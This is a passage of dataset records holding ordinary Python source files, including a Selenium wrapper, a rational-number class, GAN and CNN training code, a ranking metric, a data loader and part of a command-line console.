self.driver.switch_to.frame(self.find_element(element))\n\n    def switch_to_frame_out(self):\n        \"\"\"\n        A method specific to switch_to: moves up to the parent frame, which is handy for deeply nested frames.\n\n        Example:\n        driver.switch_to_frame_out()\n        \"\"\"\n        self.driver.switch_to.parent_frame()\n\n    def switch_to_default(self):\n        \"\"\"\n        Switch back to the top-level page.\n\n        Example:\n        driver.switch_to_default()\n        \"\"\"\n        self.driver.switch_to.default_content()\n\n    def open_new_window(self):\n        \"\"\"\n        Switch to the newly opened window.\n\n        Example:\n        driver.open_new_window()\n        \"\"\"\n        current_windows = self.driver.current_window_handle\n        all_handles = self.driver.window_handles\n        for handle in all_handles:\n            if handle != current_windows:\n                self.driver.switch_to.window(handle)\n\n    def F5(self):\n        \"\"\"\n        Refresh the current page\n\n        Example:\n        driver.F5()\n        \"\"\"\n        self.driver.refresh()\n\n    def js(self, script):\n        \"\"\"\n        Execute a JavaScript snippet.\n\n        Example: scroll to the given coordinates via js\n        driver.js(\"window.scrollTo(200,1000);\")\n        \"\"\"\n        self.driver.execute_script(script)\n\n    def accept_alert(self):\n        \"\"\"\n        Accept the alert box.\n\n        Example:\n        driver.accept_alert()\n        \"\"\"\n        self.driver.switch_to.alert.accept()\n\n    def dismiss_alert(self):\n        \"\"\"\n        Dismiss the alert box.\n\n        Example:\n        driver.dismiss_alert()\n        \"\"\"\n        self.driver.switch_to.alert.dismiss()\n\n    def close(self):\n        \"\"\"\n        Close the current page\n        Example:\n        driver.close()\n        \"\"\"\n        self.driver.close()\n\n    def quit(self):\n        \"\"\"\n        Close all pages and quit the browser\n\n        Example:\n        driver.quit()\n        \"\"\"\n        self.driver.delete_all_cookies()\n        self.driver.quit()\n\n\nif __name__ == '__main__':\n    # from BlueRose import BlueRose\n    # driver = BlueRose(\"chrome\")  # launch a browser; supports 'firefox', 'chrome', 'ie' or 'phantomjs'\n    driver = BlueRose(browser=\"chrome\")\n    driver.get(\"http://www.baidu.com\")\n    driver.max_window()  # maximize the browser\n    driver.send_keys(\"id=kw\", \"selenium\")  # type text at the element's position\n    time.sleep(2)\n    driver.click(\"id=su\")\n    time.sleep(2)\n    driver.click(\"id=result_logo\")  # click the element\n    time.sleep(2)\n    driver.F5()  # refresh the page\n    driver.get_screenshot()  # take a screenshot\n    time.sleep(2)\n    driver.back()  # go back\n    time.sleep(2)\n    driver.forward()  # go forward\n    driver.close()\n","repo_name":"yzxwp/practice","sub_path":"UI_framework/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":17170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"30319515650","text":"'''\nProgram: Rational.py\nAuthor: Eric Gimbel\nDate: 2/9/22\n\nAn ADT implementation of a rational (real) number.\nDemonstrates operator overloading\n'''\n\nimport math\n\n\nclass Rational: # I removed object/parenthesis as this is not needed in python 3 unless you have a parent class or for backward compatibility.\n    def __init__(self, num = 0, den = 1):\n        '''pre: creates a new Rational object, num and den are integers\n           post: creates the Rational object num / den, and returns num and den in reduced form\n        '''\n        # Gcd from math module to find greatest common divisor.\n        # That number is then taken and divided into the numerator and denominator, \n        # resulting in a reduced fraction.\n        
\n n = self.num * other.den + self.den * other.num \n d = self.den * other.den\n \n return Rational(n,d) \n \n def __sub__(self, other):\n '''- operator\n pre: self and other are Rational objects\n post: returns subtracted fractions in reduced form\n '''\n # Again apply cross multiplication this time subtracting.\n num = self.num * other.den - self.den * other.num\n den = self.den * other.den\n \n return Rational(num,den)\n\n def __truediv__(self, other):\n '''/ operator\n pre: self and other are Rational objects\n post: returns true division of integers in reduced form\n '''\n # The reciprocal needs to be flipped before multiplying, cross multiply!\n num = self.num * other.den\n den = self.den * other.num\n \n return Rational(num,den) \n\n def __lt__(self, other):\n '''< operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is less than second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num < den:\n return True\n else:\n return False \n\n def __gt__(self, other):\n '''> operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is greater than second (right) fraction,\n return False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num > den:\n return True\n else:\n return False\n\n def __le__(self, other):\n '''<= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is less than or equal to second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num <= den:\n return True\n else:\n return False\n\n def __ge__(self, other):\n '''>= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is greater than or equal to second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num >= den:\n return True\n else:\n return False\n\n def __eq__(self, other):\n '''== operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is equal to second (right) fraction,\n returns False if fractions are not equal\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num == den:\n return True\n else:\n return False\n \n def __ne__(self, other):\n '''!= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is not equal to second (right) fraction,\n returns False if fractions are equal\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num != den:\n return True\n else:\n return False\n \n# Sources: As your aware I did look at code that was on github. But oddly enough did not use \n# the solutions. None of the code I viewed had the unit tests. And the code I did look at was simply\n# to try and understand the differences of instance variables and local within classes. I did read about classes\n# in two books I have, which are \"Python Crash Course\" and \"Think Python.\" I read quite a bit from our\n# book and watched parts of your lecture which helped immensely. The biggest issue I had was figuring out\n# the addition method. My problem was simple math and not realizing the different ways to add/subtract fractions.\n# One thing I didn't use was my own gcd, instead I used the math module. 
The code I did view on github had a version\n# of Euclid's algorithm but I felt it wouldn't be my own, and I need to understand it before using it in my code.\n# https://github.com/zeelorenc/python-fraction-class/blob/master/fraction.py\n# https://byjus.com/maths/greatest-common-divisor/\n# https://prepinsta.com/python-program/addition-of-two-fractions/\n# https://www.mometrix.com/academy/cross-multiplying-fractions/\n# https://pythontutor.com\n# Then a ton of googling. I want to try and come up with my own gcd. Which I will continue to work on. I was able to complete the first\n# assignment with the program returning none and checking for negative numbers. These are incredible learning assignments, I do get\n# pretty frustated because I am not a math person but it is also logic as well and being able to translate things into code.\n# This assignment definately helped! In addition to running the unit tests with the values present, I also used my class to test each method\n# of code. Hopefully, everything works and I was able to properly complete the pre and post conditions.\n# testone = Rational(3,6)\n# testtwo = Rational(4,12)\n# testResult = testone + testtwo\n# print(testResult)\n# OOP is indeed awesome! (Update) Didn't completely understand the power behind classes and methods,\n# but once I tested with the code above, it really hit home how useful ADT's and OOP is!\n# Here is the GCD or Euclid's algorithm:\n#def __gcd__(a,b):\n# if b == 0: (Could also use: while b != 0: return a else: return(b, a%b)\n# return a\n# else:\n# return(b, a%b)\n\n# It solves it by taking the larger number if \"b\" isn't 0, and switching them then modulus which\n# gives the remainder and via recursion continues until \"b\" is 0 then returns \"a\" which is the GCD.\n# Although, I understand this now, I was not comfortable using it and couldn't figure out where to put\n# it in my code.\n","repo_name":"sechvn/cybersec","sub_path":"Rational_secondp/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30749396624","text":"import functools\nfrom typing import Any, Dict, Sequence, Tuple, Union, Optional, List # pylint: disable=unused-import\nfrom absl import logging\n\nfrom clu import metrics\n\nimport flax\nimport flax.linen as nn\nimport jax\nimport jax.numpy as jnp\nimport ml_collections\nimport numpy as np\n\nfrom xmcgan.libml import attention_lib as attn_lib # pylint: disable=unused-import\nfrom xmcgan.libml import losses\nfrom xmcgan.utils import pretrained_model_utils\n\n\n@flax.struct.dataclass\nclass TrainMetrics(metrics.Collection):\n\n d_loss: metrics.Average.from_output(\"d_loss\")\n g_loss: metrics.Average.from_output(\"g_loss\")\n c_loss_d: metrics.Average.from_output(\"c_loss_d\")\n c_loss_g: metrics.Average.from_output(\"c_loss_g\")\n c_loss_g_pretrained: metrics.Average.from_output(\"c_loss_g_pretrained\")\n\n\ndef create_additional_data(config: ml_collections.ConfigDict):\n \"\"\"Returns additional data required to run the model.\"\"\"\n image_model = None\n image_model_state = None\n additional_data = {}\n if config.pretrained_image_contrastive:\n (image_model,\n image_model_state) = pretrained_model_utils.get_pretrained_model()\n additional_data.update({\n \"image_model\": image_model,\n \"image_model_state\": image_model_state,\n })\n return additional_data\n\n\ndef calculate_contrastive_loss(result_dict):\n \"\"\"Calculates contrastive loss.\n\n Args:\n 
result_dict: Dictionary output from the discriminator.\n Returns:\n c_loss_d: Contrastive loss for the discriminator.\n c_loss_g: Contrastive loss for the generator.\n \"\"\"\n real_loss = result_dict[\"real_word_loss\"] + result_dict[\"real_sentence_loss\"]\n fake_loss = result_dict[\"fake_word_loss\"] + result_dict[\"fake_sentence_loss\"]\n c_loss_d = real_loss\n c_loss_g = fake_loss + result_dict[\"image_contrastive_loss\"]\n return c_loss_d, c_loss_g\n\n\ndef calculate_contrastive_loss_on_pretrained(model: nn.Module, state: Any,\n real_images: jnp.ndarray,\n fake_images: jnp.ndarray):\n \"\"\"Calculates contrastive loss on pre-trained model.\n\n Args:\n model: Pretrained model used for computing features.\n state: TrainState object at current training step.\n real_images: Array of real images.\n fake_images: Array of generated images.\n \"\"\"\n _, real_outputs = pretrained_model_utils.get_pretrained_embs(\n state, model, images=real_images)\n _, fake_outputs = pretrained_model_utils.get_pretrained_embs(\n state, model, images=fake_images)\n loss, _, _ = attn_lib.contrastive_loss(real_outputs, fake_outputs)\n return loss\n\n\ndef train_g_d(\n rng: np.ndarray,\n state: Any,\n batch: Dict[str, jnp.ndarray],\n generator: Union[nn.Module, functools.partial],\n discriminator: Union[nn.Module, functools.partial],\n config: ml_collections.ConfigDict,\n additional_data: Dict[str, Any]) -> Tuple[Any, metrics.Collection]:\n \"\"\"Perform a single training step.\n\n Args:\n rng: The random seed,\n state: State of the model (optimizer and state).\n batch: Training inputs for this step.\n generator: Flax module for the generator. The apply method must take input\n images and a boolean argument indicating whether to use training or\n inference mode.\n discriminator: Flax module for the discriminator. 
The apply method must take\n input images and a boolean argument indicating whether to use training or\n inference mode.\n config: Configuration for model.\n additional_data: Dictionary containing model specific data / networks.\n\n Returns:\n The new model state and dictionary with metrics\n \"\"\"\n logging.info(\"train_step(batch=%s)\", batch)\n\n step = state.step + 1\n if config.dtype == \"bfloat16\":\n dtype = jnp.bfloat16\n else:\n dtype = jnp.float32\n\n def loss_fn(params_d, params_g):\n g_variables = {\"params\": params_g}\n g_variables.update(state.generator_state)\n d_variables = {\"params\": params_d}\n d_variables.update(state.discriminator_state)\n if \"z\" in batch:\n z = batch[\"z\"]\n else:\n z = jax.random.normal(\n rng, (batch[\"image\"].shape[0], config.z_dim), dtype=dtype)\n real_image = batch[\"image\"]\n generated_image, new_g_variables = generator(train=True).apply(\n g_variables, (batch, z), mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n all_images = jnp.concatenate([real_image, generated_image])\n (logit, result_dict), new_d_variables = discriminator(train=True).apply(\n d_variables, (all_images, batch),\n mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n logit = jnp.asarray(logit, jnp.float32)\n real_logit, fake_logit = jnp.split(logit, 2)\n d_loss, g_loss = losses.hinge_loss(real_logit, fake_logit)\n c_loss_d, c_loss_g = calculate_contrastive_loss(result_dict)\n c_loss_g_pretrained = 0.0\n if config.pretrained_image_contrastive:\n c_loss_g_pretrained = calculate_contrastive_loss_on_pretrained(\n additional_data[\"image_model\"], additional_data[\"image_model_state\"],\n real_image, generated_image)\n d_loss = d_loss + c_loss_d\n g_loss = g_loss + c_loss_g + c_loss_g_pretrained\n new_g_state = dict(new_g_variables)\n new_d_state = dict(new_d_variables)\n return (d_loss, g_loss), (new_g_state, new_d_state, c_loss_d, c_loss_g,\n c_loss_g_pretrained)\n\n params_d = state.d_optimizer.target\n params_g = state.g_optimizer.target\n (d_loss, g_loss), func_vjp, (new_g_state, new_d_state, c_loss_d, c_loss_g,\n c_loss_g_pretrained) = jax.vjp(\n loss_fn, params_d, params_g, has_aux=True)\n\n d_grad, _ = func_vjp((1., 0.))\n _, g_grad = func_vjp((0., 1.))\n\n # Compute average gradient across multiple workers.\n d_grad = jax.lax.pmean(d_grad, axis_name=\"batch\")\n g_grad = jax.lax.pmean(g_grad, axis_name=\"batch\")\n new_d_optimizer = state.d_optimizer.apply_gradient(d_grad)\n new_g_optimizer = state.g_optimizer.apply_gradient(g_grad)\n ema_decay = config.polyak_decay\n new_ema_params = jax.tree_multimap(\n lambda ema, p: ema * ema_decay + (1 - ema_decay) * p, state.ema_params,\n new_g_optimizer.target)\n new_state = state.replace( # pytype: disable=attribute-error\n step=step,\n d_optimizer=new_d_optimizer,\n g_optimizer=new_g_optimizer,\n generator_state=new_g_state,\n discriminator_state=new_d_state,\n ema_params=new_ema_params)\n metrics_update = TrainMetrics.gather_from_model_output(\n g_loss=g_loss,\n d_loss=d_loss,\n c_loss_d=c_loss_d,\n c_loss_g=c_loss_g,\n c_loss_g_pretrained=c_loss_g_pretrained)\n return new_state, metrics_update\n\n\ndef train_d(rng: np.ndarray, state: Any, batch: Dict[str, jnp.ndarray],\n generator: Union[nn.Module, functools.partial],\n discriminator: Union[nn.Module, functools.partial],\n config: ml_collections.ConfigDict) -> Any:\n \"\"\"Perform a single training step.\n\n Args:\n rng: The random seed,\n state: State of the model (optimizer and state).\n batch: Training inputs for this step.\n generator: Flax module for the 
generator. The apply method must take input\n images and a boolean argument indicating whether to use training or\n inference mode.\n discriminator: Flax module for the discriminator. The apply method must take\n input images and a boolean argument indicating whether to use training or\n inference mode.\n config: Configuration for model.\n\n Returns:\n The new model state.\n \"\"\"\n if config.dtype == \"bfloat16\":\n dtype = jnp.bfloat16\n else:\n dtype = jnp.float32\n\n def loss_fn(params_d, params_g):\n g_variables = {\"params\": params_g}\n g_variables.update(state.generator_state)\n d_variables = {\"params\": params_d}\n d_variables.update(state.discriminator_state)\n if \"z\" in batch:\n z = batch[\"z\"]\n else:\n z = jax.random.normal(\n rng, (batch[\"image\"].shape[0], config.z_dim), dtype=dtype)\n\n generated_image, _ = generator(train=True).apply(\n g_variables, (batch, z), mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n all_images = jnp.concatenate([batch[\"image\"], generated_image])\n (logit, result_dict), new_d_variables = discriminator(train=True).apply(\n d_variables, (all_images, batch),\n mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n logit = jnp.asarray(logit, jnp.float32)\n real_logit, fake_logit = jnp.split(logit, 2)\n d_loss, _ = losses.hinge_loss(real_logit, fake_logit)\n c_loss_d, _ = calculate_contrastive_loss(result_dict)\n d_loss += c_loss_d\n new_d_state = dict(new_d_variables)\n return d_loss, new_d_state\n\n params_d = state.d_optimizer.target\n params_g = state.g_optimizer.target\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (d_loss, new_d_state), d_grad = grad_fn(params_d, params_g)\n del d_loss\n # Compute average gradient across multiple workers.\n d_grad = jax.lax.pmean(d_grad, axis_name=\"batch\")\n new_d_optimizer = state.d_optimizer.apply_gradient(d_grad)\n new_state = state.replace( # pytype: disable=attribute-error\n d_optimizer=new_d_optimizer,\n discriminator_state=new_d_state)\n return new_state\n","repo_name":"google-research/xmcgan_image_generation","sub_path":"xmcgan/xmc_gan.py","file_name":"xmc_gan.py","file_ext":"py","file_size_in_byte":9143,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"48"} +{"seq_id":"817112806","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"chainedcache\",\n version=\"0.0.1\",\n author=\"Janos Tolgyesi\",\n author_email=\"janos.tolgyesi@gmail.com\",\n description=\"A simple cache in python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mrtj/chainedcache\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)\n","repo_name":"mrtj/chainedcache","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"914789400","text":"import tensorflow as tf\n\nINPUT_NODE = 2304\nOUTPUT_NODE = 7\n\nIMAGE_SIZE = 48\nNUM_CHANNELS = 3\nNUM_LABELS = 10\n\nKEEP_PROP = 0.3\n\nKEEP_PROP_NEXT = 0.3\n\n# Defines the forward pass of the convolutional network.\n# input_tensor : the input training data\n# train : whether this is the training or the testing phase; dropout is applied only during training\ndef inference(input_tensor, train):\n # First convolutional layer: a 5*5 kernel, stride 1, SAME padding\n # Activation function: relu\n 
# Input: 48 * 48 * 1\n # Output: 48 * 48 * 32\n with tf.variable_scope('layer1-conv1'):\n layer1_weight = tf.get_variable(\n \"weight\", [5,5,1,32], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer1_bias = tf.get_variable(\n \"bias\", [32], initializer=tf.constant_initializer(0.1))\n layer1_conv = tf.nn.conv2d(\n input_tensor, layer1_weight, strides=[1,1,1,1], padding='SAME')\n layer1_relu = tf.nn.relu(tf.nn.bias_add(layer1_conv, layer1_bias))\n\n print('conv layer 1 output size', layer1_relu.get_shape().as_list())\n\n # First pooling layer: 3*3 window, stride 2, SAME padding\n # Output: 24 * 24 * 32\n with tf.variable_scope('layer2-pool1'):\n layer2_pool = tf.nn.max_pool(layer1_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('pool layer 1 output size', layer2_pool.get_shape().as_list())\n\n # Second convolutional layer\n # Activation function: relu\n # Output: 24 * 24 * 32\n with tf.variable_scope('layer3-conv2'):\n layer3_weight = tf.get_variable(\n \"weight\", [4, 4, 32, 32], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer3_bias = tf.get_variable(\n \"bias\", [32], initializer=tf.constant_initializer(0.1))\n layer3_conv = tf.nn.conv2d(\n layer2_pool, layer3_weight, strides=[1, 1, 1, 1], padding='SAME')\n layer3_relu = tf.nn.relu(tf.nn.bias_add(layer3_conv, layer3_bias))\n\n print('conv layer 2 output size', layer3_relu.get_shape().as_list())\n\n # Second pooling layer\n # Output: 12 * 12 * 32\n with tf.variable_scope('layer4-pool2'):\n layer4_pool = tf.nn.max_pool(layer3_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('pool layer 2 output size', layer4_pool.get_shape().as_list())\n\n # Third convolutional layer\n # Activation function: relu\n # Output: 12 * 12 * 64\n with tf.variable_scope('layer5-conv3'):\n layer5_weight = tf.get_variable(\n \"weight\", [5, 5, 32, 64], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer5_bias = tf.get_variable(\n \"bias\", [64], initializer=tf.constant_initializer(0.1))\n layer5_conv = tf.nn.conv2d(\n layer4_pool, layer5_weight, strides=[1, 1, 1, 1], padding='SAME')\n layer5_relu = tf.nn.relu(tf.nn.bias_add(layer5_conv, layer5_bias))\n\n print('conv layer 3 output size', layer5_relu.get_shape().as_list())\n\n # Third pooling layer\n # Output: 6 * 6 * 64\n with tf.variable_scope('layer6-pool3'):\n layer6_pool = tf.nn.max_pool(layer5_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('pool layer 3 output size', layer6_pool.get_shape().as_list())\n\n # Flatten the feature maps before the fully connected layers.\n # Three stride-2 SAME pools bring 48 -> 24 -> 12 -> 6, so this is 6 * 6 * 64 = 2304 features.\n # pool_shape = layer6_pool.get_shape().as_list()\n # nodes = pool_shape[1] * pool_shape[2] * pool_shape[3]\n # reshaped = tf.reshape(layer6_pool, [pool_shape[0], nodes])\n reshaped = tf.reshape(layer6_pool, [-1, 2304])\n\n # First fully connected layer\n # Output: 1 * 1 * 2048\n with tf.variable_scope('layer7-fc1'):\n layer7_weight = tf.get_variable(\n \"weight\", [2304, 2048], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer7_bias = tf.get_variable(\"bias\", [2048], initializer=tf.constant_initializer(0.1))\n layer7_fc = tf.nn.relu(tf.matmul(reshaped, layer7_weight) + layer7_bias)\n if train:\n layer7_fc = tf.nn.dropout(layer7_fc, KEEP_PROP, name='layer7')\n\n # Second fully connected layer\n # Output: 1 * 1 * 1024\n with tf.variable_scope('layer8-fc2'):\n layer8_weight = tf.get_variable(\n \"weight\", [2048, 1024], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer8_bias = tf.get_variable(\"bias\", [1024], initializer=tf.constant_initializer(0.1))\n layer8_fc = tf.nn.relu(tf.matmul(layer7_fc, layer8_weight) + layer8_bias)\n if train:\n layer8_fc = tf.nn.dropout(layer8_fc, KEEP_PROP_NEXT, name='dropout')\n\n # Third fully connected layer\n # Output: 1 * 1 * 7\n with tf.variable_scope('layer9-fc3'):\n layer9_weight = tf.get_variable(\n 
\"weight\", [1024, 7], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer9_bias = tf.get_variable(\"bias\", [7], initializer=tf.constant_initializer(0.1))\n logit = tf.matmul(layer8_fc, layer9_weight, name='logits') + layer9_bias\n return logit\n\n\n\n\n\n","repo_name":"XingToMax/FaceEmotionalRecognition","sub_path":"inference/main_inference.py","file_name":"main_inference.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"42699810245","text":"\"\"\"\nHitrate metric:\n * :func:`hitrate`\n\"\"\"\nimport torch\n\n\ndef hitrate(\n outputs: torch.Tensor, targets: torch.Tensor, k=10\n) -> torch.Tensor:\n \"\"\"\n Calculate the hit rate score given model outputs and targets.\n Hit-rate is a metric for evaluating ranking systems.\n Generate top-N recommendations and if one of the recommendation is\n actually what user has rated, you consider that a hit.\n By rate we mean any explicit form of user's interactions.\n Add up all of the hits for all users and then divide by number of users\n\n Compute top-N recomendation for each user in the training stage\n and intentionally remove one of this items fro the training data.\n\n Args:\n outputs (torch.Tensor):\n Tensor weith predicted score\n size: [batch_size, slate_length]\n model outputs, logits\n targets (torch.Tensor):\n Binary tensor with ground truth.\n 1 means the item is relevant\n for the user and 0 not relevant\n size: [batch_szie, slate_length]\n ground truth, labels\n k (int):\n Parameter fro evaluation on top-k items\n\n Returns:\n hitrate (torch.Tensor): the hit rate score\n \"\"\"\n k = min(outputs.size(1), k)\n\n _, indices_for_sort = outputs.sort(descending=True, dim=-1)\n true_sorted_by_preds = torch.gather(\n targets, dim=-1, index=indices_for_sort\n )\n true_sorted_by_pred_shrink = true_sorted_by_preds[:, :k]\n hits = torch.sum(true_sorted_by_pred_shrink, dim=1) / k\n return hits\n\n\n__all__ = [\"hitrate\"]\n","repo_name":"hakanaku1234/catalyst-1","sub_path":"catalyst/metrics/hitrate.py","file_name":"hitrate.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40667967313","text":"from os import path\nimport json\nfrom Utils.Structures import Node \nfrom Utils import Constants\nimport numpy as np\nimport copy\nimport treelstm\nimport torch\n\n\n# max number of ASTs and Commits \nN_ASTS = 1\nN_COMMITS = 10\nN_PRDESC = Constants.MAX_LEN\n\ndefault_ast = {\n 'nodes': [[-1, -1], [-1, -1]],\n 'edges': [[0,1]]\n}\n\ndefault_commit = {\n 'cm': [1],\n 'comments': [1],\n 'old_asts': [default_ast]*N_ASTS,\n 'cur_asts': [default_ast]*N_ASTS\n}\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef adjust_asts(asts: list):\n\n n = len(asts)\n\n if n < N_ASTS:\n asts.extend([default_ast]*(N_ASTS - n))\n elif n > N_ASTS:\n asts = asts[:N_ASTS]\n\n return asts\n\ndef adjust_commits(commits: dict):\n\n n = len(commits)\n\n if n < N_COMMITS:\n for i in range(1, N_COMMITS-n+1):\n commits[f'key{i}'] = copy.deepcopy(default_commit)\n elif n > N_COMMITS:\n keys = list(commits.keys())\n keys = keys[N_COMMITS:]\n for k in keys:\n del commits[k]\n\n return commits\n\ndef adjust_body(body: list):\n \n '''Fixes the size of body'''\n if len(body) >= N_PRDESC:\n body = body[:N_PRDESC-1] + [2]\n elif len(body) < N_PRDESC:\n body.append(2)\n body.extend([1]*(N_PRDESC - len(body)))\n\n return body\n\n\ndef 
def _build_tree(node, adj):\n\n for child_id in adj[str(node.id)]['children']:\n \n child = Node(child_id, adj[str(child_id)]['label'])\n node.children.append(child)\n _build_tree(child, adj)\n \n\ndef build_tree(adj):\n\n if len(adj) == 0:\n # adj = {}\n return Node(0, 1) # 0 -> id, 1 -> _BLANK\n \n root_id = list(adj.keys())[0]\n root = Node(root_id, adj[root_id]['label'])\n _build_tree(root, adj)\n\n return root\n\ndef convert_tree_to_tensors(tree):\n\n node_order, edge_order = treelstm.calculate_evaluation_orders(tree['edges'], len(tree['nodes']))\n\n return {\n 'features': torch.tensor(tree['nodes'], device=device, dtype=torch.float32),\n 'adjacency_list': torch.tensor(tree['edges'], device=device, dtype=torch.int64),\n 'node_order': torch.tensor(node_order, device=device, dtype=torch.int64),\n 'edge_order': torch.tensor(edge_order, device=device, dtype=torch.int64)\n }\n\n\n\n'''\nLoads the dataset from a json file into memory.\nConverts lists of numbers to numpy arrays.\nAdjusts the number of ASTs and commits.\nBuilds the tree using the Node data structure.\n'''\ndef load_data(file_path):\n\n with open(file_path) as f:\n dataset = json.load(f)\n \n for key in dataset:\n dataset[key]['body'] = np.array(adjust_body(dataset[key]['body']))\n dataset[key]['issue_title'] = np.array(dataset[key]['issue_title'] if len(dataset[key]['issue_title']) > 0 else [1])\n\n commits = dataset[key]['commits']\n commits = adjust_commits(commits)\n\n for commit_sha in commits:\n\n commits[commit_sha]['cm'] = np.array(commits[commit_sha]['cm'] if len(commits[commit_sha]['cm']) > 0 else [1])\n commits[commit_sha]['comments'] = np.array(commits[commit_sha]['comments'] if len(commits[commit_sha]['comments']) > 0 else [1])\n\n old_asts = dataset[key]['commits'][commit_sha]['old_asts']\n old_asts = adjust_asts(old_asts)\n # dataset[key]['commits'][commit_sha]['old_asts'] = [build_tree(x) for x in old_asts]\n dataset[key]['commits'][commit_sha]['old_asts'] = [convert_tree_to_tensors(x) for x in old_asts]\n\n cur_asts = dataset[key]['commits'][commit_sha]['cur_asts']\n cur_asts = adjust_asts(cur_asts)\n # dataset[key]['commits'][commit_sha]['cur_asts'] = [build_tree(x) for x in cur_asts]\n dataset[key]['commits'][commit_sha]['cur_asts'] = [convert_tree_to_tensors(x) for x in cur_asts]\n \n dataset[key]['commits'] = commits\n\n return dataset\n \n\n\nif __name__ == '__main__':\n\n data = load_data('../Data/sample_dataset_proc.json')\n root = data['elastic/elasticsearch_37964']['commits'][\"'df18d6b7d9d2236d1512f7476301ecda15b20401'\"]['old_asts'][0]\n\n def find_height(root):\n\n if len(root.children) == 0:\n return 1\n \n h_max = 0\n\n for child in root.children:\n h_max = max(h_max, find_height(child))\n \n return h_max + 1\n\n print(find_height(root))","repo_name":"AnuraagReddy123/CodeSummarization","sub_path":"Model_Pytorch/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17245844106","text":"from Projectile import Projectile\r\nimport matplotlib.pyplot as plt\r\n\r\n# a is chosen so that the sphere's diameter equals the cube's edge, to compare the motions\r\nkugla = Projectile(10, 0.5, 'kugla')\r\nkocka = Projectile(10, 1, 'kocka')\r\n\r\nkugla.kosiHitac_Euler(0, 10, 45, 0.01, 10, 1)\r\nkocka.kosiHitac_Euler(0, 10, 45, 0.01, 10, 1)\r\n\r\nplt.plot(kugla.x, kugla.y, label='kugla')\r\nplt.plot(kocka.x, kocka.y, 
label='kocka')\r\nplt.xlabel('x/m')\r\nplt.ylabel('y/m')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n","repo_name":"anacavar/PAF","sub_path":"Domaci/Domaci_4/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13144809837","text":"#!/usr/bin/python3\n\"\"\"\nThis module provides a python command line interpreter\n\"\"\"\nimport cmd\nimport sys\nimport shlex\nimport re\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nfrom models import storage\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Provides methods that ensure proper functioning of\n the interpreter\n \"\"\"\n prompt = \"(hbnb) \"\n all_classes = [\n \"BaseModel\",\n \"User\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Place\",\n \"Review\"\n ]\n\n def precmd(self, line):\n \"\"\"Split the input into command and arguments\n and returns the modified arguments\n \"\"\"\n if not sys.stdin.isatty():\n print()\n return line\n\n def default(self, line):\n \"\"\"Handles commands with the form\n `. (, arg2>, ...)`\n \"\"\"\n command_parts = line.split(\".\")\n\n # Map method names to corresponding methods\n method_mapping = {\n \"all()\": self.do_all,\n \"count()\": self.do_count\n }\n\n # Check if the class (first arg) is valid\n if any(command_parts[0] == class_name for\n class_name in self.all_classes):\n # Get the method and required arguments to execute\n if command_parts[1] in method_mapping:\n method = method_mapping[command_parts[1]]\n method(f\"{command_parts[0]} {command_parts[1]}\")\n elif command_parts[1].startswith(\"show\"):\n # Extract the ID from the show command\n instance_id = 